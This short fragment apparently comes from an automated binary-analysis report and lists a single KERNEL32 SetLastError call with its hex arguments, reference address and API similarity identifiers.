                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0